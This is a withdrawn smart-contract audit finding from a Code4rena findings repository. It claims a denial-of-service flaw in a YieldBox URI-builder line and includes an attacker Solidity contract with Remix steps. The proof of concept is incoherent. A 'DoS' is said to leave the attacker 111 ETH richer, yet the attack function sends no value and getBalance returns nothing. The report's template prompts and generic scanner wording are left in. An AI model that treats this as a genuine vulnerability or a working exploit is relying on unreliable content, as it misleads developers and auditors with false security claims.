search

code-423n4 / 2023-07-tapioca-findings

12 stars 9 forks source link

[M-02] SWC-113 DoS with Failed Call #310

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/Tapioca-DAO/YieldBox/blob/f5ad271b2dcab8b643b7cf622c2d6a128e109999/contracts/YieldBoxURIBuilder.sol#L59

Vulnerability details

Impact

Detailed description of the impact of this finding.

This call is executed following another call within the same transaction. It is possible that the call never gets executed if a prior call fails permanently. This might be caused intentionally by a malicious callee.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

Vulnerable File

/YieldBoxURIBuilder.sol

Vulnerable URL

https://github.com/Tapioca-DAO/YieldBox/blob/f5ad271b2dcab8b643b7cf622c2d6a128e109999/contracts/YieldBoxURIBuilder.sol#L59

Vulnerable code

 return string(abi.encodePacked(token.safeSymbol(), " (", asset.strategy.name(), ")"));

Dos Test Case

NB: Using Remix Dev Foundry Deployment
1. switch to first account (as alice) and deploy the victim contract.
2. switch to second account (as eve) and deploy the attack contract. 
3. switch to first account (as alice) and select 111 ETH and enter address and string values and click symbol() button.
4. switch to second account (as eve) and select 111 ETH and paste victim contract address for alice in input box next to button for attack() and then click attack() button.
5. in account 2 for eve, click getbalance button and balance is +111 ETH.

PoC

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;
import "/2023-07-tapioca/tap-token-audit/node_modules/@openzeppelin/contracts/utils/Strings.sol";
import "/2023-07-tapioca/tap-token-audit/node_modules/@boringcrypto/boring-solidity/contracts/libraries/Base64.sol";
import "/2023-07-tapioca/tap-token-audit/node_modules/@boringcrypto/boring-solidity/contracts/libraries/BoringERC20.sol";
import "./interfaces/IYieldBox.sol";
import "./NativeTokenFactory.sol";
import "./YieldBoxURIBuilder.sol";
import "/2023-07-tapioca/YieldBox/contracts/enums/YieldBoxTokenType.sol";
import "/2023-07-tapioca/YieldBox/contracts/interfaces/IStrategy.sol";

contract AttackYieldBoxURIBuilder is YieldBoxURIBuilder {

   YieldBoxURIBuilder public yieldboxuribuilder;

   constructor(YieldBoxURIBuilder _yieldboxuribuilder) {

       yieldboxuribuilder = YieldBoxURIBuilder(_yieldboxuribuilder);

      }

      function attack() public payable  {
          yieldboxuribuilder.symbol(Asset(TokenType(1), address(yieldboxuribuilder), IStrategy(address(yieldboxuribuilder)), 111), "ETH");
      }

      function getBalance() public payable {
           address(this).balance;
       }

   }

Tools Used

Mythx
Visual Studio Code
Foundry
Remix IDE

Recommended Mitigation Steps

If possible, refactor the code such that each transaction only executes one external call or make sure that all callees can be trusted (i.e. they're part of your own codebase).

Assessed type

DoS

code423n4 commented 1 year ago

Withdrawn by debo